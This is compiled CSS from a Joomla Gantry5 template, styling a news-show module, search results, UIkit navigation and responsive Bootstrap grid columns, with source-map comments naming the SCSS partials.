/* line 1, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
/* line 2, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-title {
  margin: 0 0 10px;
  font-size: 1.035rem;
  font-weight: normal;
}
/* line 6, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-title a {
  color: #282828;
}
/* line 8, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-title a:hover {
  color: #4f953b;
}
/* line 13, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-introtext {
  margin: 0;
}
/* line 16, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
/* line 17, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-social span {
  margin-left: 0 !important;
  margin-right: 10px;
}
/* line 22, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-rating {
  margin-bottom: 10px;
}
/* line 25, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links {
  margin-top: 10px;
  font-size: 0.81rem;
}
/* line 28, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-created {
  margin-right: 15px;
}
/* line 30, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-created:before {
  content: "\f017";
  font-family: FontAwesome;
  margin-right: 2px;
}
/* line 36, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-author {
  margin-right: 15px;
}
/* line 38, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-author:before {
  content: "\f007";
  font-family: FontAwesome;
  margin-right: 2px;
}
/* line 44, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-category {
  margin-right: 15px;
}
/* line 46, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-category a {
  color: #959595;
}
/* line 48, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-category a:before {
  content: "\f07c";
  font-family: FontAwesome;
  margin-right: 2px;
}
/* line 53, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-category a:hover {
  color: #4f953b;
}
/* line 58, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-comments {
  margin: 0;
  margin-right: 15px;
  color: #959595;
  background: none;
  padding: 0;
  font-size: inherit;
}
/* line 65, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-comments:before {
  content: "\f086";
  font-family: FontAwesome;
  margin-right: 6px;
}
/* line 70, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-comments:hover {
  color: #4f953b;
}
/* line 74, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-hits {
  margin-right: 15px;
  background: none;
  padding: 0;
  color: #959595;
  font-size: inherit;
}
/* line 80, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-hits:before {
  content: "\f06e";
  font-family: FontAwesome;
  margin-right: 6px;
}
/* line 86, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-readmore {
  margin: 0;
  margin-right: 15px;
  color: #959595;
}
/* line 90, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-readmore span {
  background: none;
  padding: 0;
  font-size: inherit;
}
/* line 95, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-readmore:before {
  content: "\f0c1";
  font-family: FontAwesome;
  margin-right: 6px;
}
/* line 100, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-readmore:hover {
  color: #4f953b;
}
/* line 105, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-page-inner-custom {
  overflow: hidden;
}
/* line 107, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-page-inner-custom > div {
  margin-bottom: 30px;
}
/* line 109, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-page-inner-custom > div:last-child {
  margin-bottom: 0;
}
/* line 114, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-image-link {
  position: relative;
}
/* line 116, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
/* line 117, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-image-link:hover .ns2-image-overlay {
  opacity: 1;
}
@media only all and (max-width: 30rem) {
  .nssp2 .ns2-image-link {
    margin-bottom: 15px;
  }
}
/* line 125, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-image-overlay {
  background: rgba(0, 0, 0, 0.5);
  color: #fff;
  padding: 20px;
  position: absolute;
  top: 0;
  bottom: 0;
  left: 0;
  right: 0;
  opacity: 0;
  -webkit-transition: opacity 0.3s;
  -moz-transition: opacity 0.3s;
  transition: opacity 0.3s;
}
/* line 136, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-image-overlay:before {
  font-size: 25px;
  height: 25px;
  width: 25px;
  margin-left: -11px;
  margin-top: -17px;
  color: #fff;
  position: absolute;
  left: 50%;
  top: 50%;
  content: "\f0c1";
  font-family: FontAwesome;
}
/* line 151, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-wrap {
  position: relative;
}
/* line 153, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-wrap .ns2-art-controllers {
  position: absolute;
  top: -58px;
  right: 0;
}
/* line 157, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-prev, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-prev, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-play, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-play, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-pause, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-pause, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-next, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-next, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-pagination span, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-pagination span {
  background: none;
  text-indent: 0;
  height: auto;
  width: auto;
}
/* line 163, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
/* line 164, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-pagination span, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-pagination span {
  color: #959595;
  -webkit-transition: color 0.2s;
  -moz-transition: color 0.2s;
  transition: color 0.2s;
}
/* line 167, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-pagination span:hover, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-pagination span:hover, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-pagination span.active, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-pagination span.active {
  color: #c8c8c8;
}
/* line 172, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-prev, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-prev, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-next, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-next {
  padding: 5px 10px;
  background: #4f953b;
  color: #fff;
  border-radius: 3px;
  font-size: 11px;
  margin-top: -4px;
  margin-right: 0;
  margin-left: 5px;
  -webkit-transition: all 0.2s;
  -moz-transition: all 0.2s;
  transition: all 0.2s;
}
/* line 182, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-prev i, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-prev i, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-next i, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-next i {
  vertical-align: middle;
}
/* line 185, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-prev:hover, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-prev:hover, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-next:hover, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-next:hover {
  background: #282828;
}
/* line 193, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
/* line 194, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
/* line 195, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.footer .nssp2 .ns2-title {
  font-size: 0.9rem;
  margin: 0;
}
/* line 200, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
/* line 201, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.footer .ns2-page-inner-custom > div {
  margin: 0;
  border-bottom: 1px solid #353535;
}
/* line 204, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.footer .ns2-page-inner-custom > div:last-child {
  border: none;
}
/* line 206, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
/* line 207, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.footer .ns2-page-inner-custom > div:last-child .ns2-column > div {
  padding-bottom: 0 !important;
}
/* line 213, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
/* line 214, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
/* line 215, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.footer .ns2-page-inner-custom .ns2-first .ns2-column > div {
  padding-top: 0 !important;
}
/* line 1, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
/* line 2, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-form-results {
  width: 500px;
  margin: 0 auto;
  text-align: center;
  padding: 50px;
  border: 1px solid #ddd;
  margin-bottom: 70px;
}
@media only all and (max-width: 47.938rem) {
  .search .search-form-results {
    width: 100%;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .search .search-form-results {
    width: 100%;
  }
}
/* line 15, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-form-results .btn-toolbar {
  margin-top: 0;
}
/* line 17, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-form-results .btn-toolbar .btn-group {
  float: none;
  margin: 0;
}
/* line 20, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-form-results .btn-toolbar .btn-group input {
  width: 100%;
  margin: 0;
  border-right: none;
}
@media only all and (max-width: 30rem) {
  .search .search-form-results .btn-toolbar .btn-group input {
    width: 120px;
  }
}
/* line 28, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-form-results .btn-toolbar .btn-group .btn {
  padding: 0.58rem 1rem !important;
  border-radius: 0 !important;
}
/* line 31, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-form-results .btn-toolbar .btn-group .btn > span {
  vertical-align: middle;
  margin: 0;
}
/* line 38, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
/* line 39, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-form-results .searchintro > p {
  margin-bottom: 0;
}
/* line 42, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-form-results .searchintro .badge {
  background: #4f953b;
  border-radius: 0;
  text-shadow: none;
}
/* line 49, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-add-options {
  padding: 50px;
  border: 1px solid #ddd;
  margin: 0 auto 50px;
  width: 600px;
}
@media only all and (max-width: 47.938rem) {
  .search .search-add-options {
    width: 100%;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .search .search-add-options {
    width: 100%;
  }
}
@media only all and (min-width: 60rem) and (max-width: 74.938rem) {
  .search .search-add-options {
    width: 550px;
  }
}
/* line 63, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-add-options > fieldset {
  display: inline-block;
}
/* line 65, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-add-options > fieldset:first-child {
  margin-right: 50px;
}
@media only all and (max-width: 47.938rem) {
  .search .search-add-options > fieldset:first-child {
    margin-bottom: 50px;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .search .search-add-options > fieldset:first-child {
    margin-bottom: 50px;
  }
}
/* line 76, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
/* line 77, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-results .result-item {
  padding: 40px 0 40px 50px;
  border-top: 1px solid #ddd;
  position: relative;
}
/* line 81, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-results .result-item .item-number {
  position: absolute;
  left: 0;
  border: 1px solid #ddd;
  text-align: center;
  width: 30px;
  height: 30px;
  line-height: 30px;
  border-radius: 0;
}
/* line 91, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-results .result-item .result-title {
  line-height: 30px;
}
/* line 93, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
/* line 94, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-results .result-item .result-title h4 a {
  color: #282828;
}
/* line 96, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-results .result-item .result-title h4 a:hover {
  color: #4f953b;
}
/* line 102, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-results .result-item dd {
  margin: 0;
}
/* line 105, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-results .result-item .search-item-info {
  margin-top: 20px;
}
/* line 107, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-results .result-item .search-item-info dd {
  display: inline-block;
  margin-right: 20px;
}
/* line 110, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-results .result-item .search-item-info dd i {
  margin-right: 7px;
}
/* line 1, templates/it_sanctum/scss/sanctum-joomla/_uikit.scss */
/* line 3, templates/it_sanctum/scss/sanctum-joomla/_uikit.scss */
/* line 4, templates/it_sanctum/scss/sanctum-joomla/_uikit.scss */
.uk-dotnav > * > *, .uk-dotnav-contrast > * > * {
  border-radius: 0px !important;
  background: rgba(0, 0, 0, 0.1) !important;
}
/* line 9, templates/it_sanctum/scss/sanctum-joomla/_uikit.scss */
/* line 10, templates/it_sanctum/scss/sanctum-joomla/_uikit.scss */
.uk-dotnav > .uk-active > *, .uk-dotnav-contrast > .uk-active > * {
  background: rgba(0, 0, 0, 0.2) !important;
}
/* line 16, templates/it_sanctum/scss/sanctum-joomla/_uikit.scss */
/* line 17, templates/it_sanctum/scss/sanctum-joomla/_uikit.scss */
/* line 18, templates/it_sanctum/scss/sanctum-joomla/_uikit.scss */
.g-container .uk-slidenav-position .uk-slidenav {
  border-radius: 0;
  background: transparent;
  font-size: 50px;
  color: rgba(0, 0, 0, 0.3);
  -webkit-transition: color 0.2s;
  -moz-transition: color 0.2s;
  transition: color 0.2s;
}
/* line 24, templates/it_sanctum/scss/sanctum-joomla/_uikit.scss */
.g-container .uk-slidenav-position .uk-slidenav:hover {
  color: #4f953b;
}
/* line 31, templates/it_sanctum/scss/sanctum-joomla/_uikit.scss */
/* line 32, templates/it_sanctum/scss/sanctum-joomla/_uikit.scss */
/* line 33, templates/it_sanctum/scss/sanctum-joomla/_uikit.scss */
.uk-modal .uk-slidenav-position .uk-slidenav {
  border-radius: 0;
  background: transparent;
  font-size: 50px;
  color: rgba(0, 0, 0, 0.3);
  -webkit-transition: color 0.2s;
  -moz-transition: color 0.2s;
  transition: color 0.2s;
}
/* line 39, templates/it_sanctum/scss/sanctum-joomla/_uikit.scss */
.uk-modal .uk-slidenav-position .uk-slidenav:hover {
  color: #4f953b;
}
/* line 46, templates/it_sanctum/scss/sanctum-joomla/_uikit.scss */
.uk-grid-divider > * {
  padding-left: 35px !important;
  margin-bottom: 20px !important;
}
@media only all and (max-width: 47.938rem) {
  /* line 2, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .navbar-fixed-top, .navbar-fixed-bottom, .navbar-static-top {
    margin-right: -20px;
    margin-left: -20px;
  }
  /* line 8, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .container-fluid {
    padding: 0;
  }
  /* line 11, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .dl-horizontal dt {
    float: none;
    width: auto;
    clear: none;
    text-align: left;
  }
  /* line 17, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .dl-horizontal dd {
    margin-left: 0;
  }
  /* line 20, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid {
    width: 100%;
  }
  /* line 23, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row, .thumbnails {
    margin-left: 0;
  }
  /* line 27, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .thumbnails > li {
    float: none;
    margin-left: 0;
  }
  /* line 32, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .manager.thumbnails > li {
    float: left;
    margin-left: 20px;
  }
  /* line 37, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  [class*="span"], .uneditable-input[class*="span"], .row-fluid [class*="span"] {
    display: block;
    float: none;
    width: 100%;
    margin-left: 0;
    box-sizing: border-box;
  }
  /* line 46, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .span12, .row-fluid .span12 {
    width: 100%;
    box-sizing: border-box;
  }
  /* line 51, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid [class*="offset"]:first-child {
    margin-left: 0;
  }
  /* line 54, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .input-large, .input-xlarge, .input-xxlarge, input[class*="span"], select[class*="span"], textarea[class*="span"], .uneditable-input {
    display: block;
    width: 100%;
    min-height: 30px;
    box-sizing: border-box;
  }
  /* line 66, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .input-prepend input, .input-append input, .input-prepend input[class*="span"], .input-append input[class*="span"] {
    display: inline-block;
    width: auto;
  }
  /* line 73, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .controls-row [class*="span"] + [class*="span"] {
    margin-left: 0;
  }
}
@media only all and (max-width: 30rem) {
  /* line 79, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse {
    -webkit-transform: translate3d(0, 0, 0);
  }
  /* line 82, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .page-header h1 small {
    display: block;
    line-height: 20px;
  }
  /* line 86, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .form-horizontal .control-label {
    float: none;
    width: auto;
    padding-top: 0;
    text-align: left;
  }
  /* line 92, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .form-horizontal .controls {
    margin-left: 0;
  }
  /* line 95, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .form-horizontal .control-list {
    padding-top: 0;
  }
  /* line 98, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .form-horizontal .form-actions {
    padding-right: 10px;
    padding-left: 10px;
  }
  /* line 102, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .media .pull-left, .media .pull-right {
    display: block;
    float: none;
    margin-bottom: 10px;
  }
  /* line 108, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .media-object {
    margin-right: 0;
    margin-left: 0;
  }
  /* line 112, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .modal-header .close {
    padding: 10px;
    margin: -10px;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  /* line 119, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row {
    margin-left: -20px;
  }
  /* line 122, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row:before, .row:after {
    display: table;
    line-height: 0;
    content: "";
  }
  /* line 128, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row:after {
    clear: both;
  }
  /* line 131, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  [class*="span"] {
    float: left;
    min-height: 1px;
    margin-left: 20px;
  }
  /* line 136, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .span12 {
    width: 724px;
  }
  /* line 139, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .span11 {
    width: 662px;
  }
  /* line 142, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .span10 {
    width: 600px;
  }
  /* line 145, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .span9 {
    width: 538px;
  }
  /* line 148, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .span8 {
    width: 476px;
  }
  /* line 151, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .span7 {
    width: 414px;
  }
  /* line 154, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .span6 {
    width: 352px;
  }
  /* line 157, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .span5 {
    width: 290px;
  }
  /* line 160, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .span4 {
    width: 228px;
  }
  /* line 163, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .span3 {
    width: 166px;
  }
  /* line 166, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .span2 {
    width: 104px;
  }
  /* line 169, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .span1 {
    width: 42px;
  }
  /* line 172, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .offset12 {
    margin-left: 764px;
  }
  /* line 175, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .offset11 {
    margin-left: 702px;
  }
  /* line 178, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .offset10 {
    margin-left: 640px;
  }
  /* line 181, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .offset9 {
    margin-left: 578px;
  }
  /* line 184, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .offset8 {
    margin-left: 516px;
  }
  /* line 187, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .offset7 {
    margin-left: 454px;
  }
  /* line 190, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .offset6 {
    margin-left: 392px;
  }
  /* line 193, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .offset5 {
    margin-left: 330px;
  }
  /* line 196, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .offset4 {
    margin-left: 268px;
  }
  /* line 199, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .offset3 {
    margin-left: 206px;
  }
  /* line 202, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .offset2 {
    margin-left: 144px;
  }
  /* line 205, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .offset1 {
    margin-left: 82px;
  }
  /* line 208, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid {
    width: 100%;
  }
  /* line 211, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid:before, .row-fluid:after {
    display: table;
    line-height: 0;
    content: "";
  }
  /* line 217, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid:after {
    clear: both;
  }
  /* line 220, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid [class*="span"] {
    display: block;
    float: left;
    width: 100%;
    min-height: 30px;
    margin-left: 2.7624309392%;
    box-sizing: border-box;
  }
  /* line 228, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid [class*="span"]:first-child {
    margin-left: 0;
  }
  /* line 231, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .controls-row [class*="span"] + [class*="span"] {
    margin-left: 2.7624309392%;
  }
  /* line 234, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .span12 {
    width: 100%;
  }
  /* line 237, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .span11 {
    width: 91.4364640884%;
  }
  /* line 240, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .span10 {
    width: 82.8729281768%;
  }
  /* line 243, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .span9 {
    width: 74.3093922652%;
  }
  /* line 246, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .span8 {
    width: 65.7458563536%;
  }
  /* line 249, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .span7 {
    width: 57.182320442%;
  }
  /* line 252, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .span6 {
    width: 48.6187845304%;
  }
  /* line 255, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .span5 {
    width: 40.0552486188%;
  }
  /* line 258, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .span4 {
    width: 31.4917127072%;
  }
  /* line 261, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .span3 {
    width: 22.9281767956%;
  }
  /* line 264, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .span2 {
    width: 14.364640884%;
  }
  /* line 267, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .span1 {
    width: 5.8011049724%;
  }
  /* line 270, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset12 {
    margin-left: 105.5248618785%;
  }
  /* line 273, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset12:first-child {
    margin-left: 102.7624309392%;
  }
  /* line 276, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset11 {
    margin-left: 96.9613259669%;
  }
  /* line 279, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset11:first-child {
    margin-left: 94.1988950276%;
  }
  /* line 282, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset10 {
    margin-left: 88.3977900552%;
  }
  /* line 285, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset10:first-child {
    margin-left: 85.635359116%;
  }
  /* line 288, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset9 {
    margin-left: 79.8342541436%;
  }
  /* line 291, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset9:first-child {
    margin-left: 77.0718232044%;
  }
  /* line 294, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset8 {
    margin-left: 71.270718232%;
  }
  /* line 297, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset8:first-child {
    margin-left: 68.5082872928%;
  }
  /* line 300, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset7 {
    margin-left: 62.7071823204%;
  }
  /* line 303, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset7:first-child {
    margin-left: 59.9447513812%;
  }
  /* line 306, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset6 {
    margin-left: 54.1436464088%;
  }
  /* line 309, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
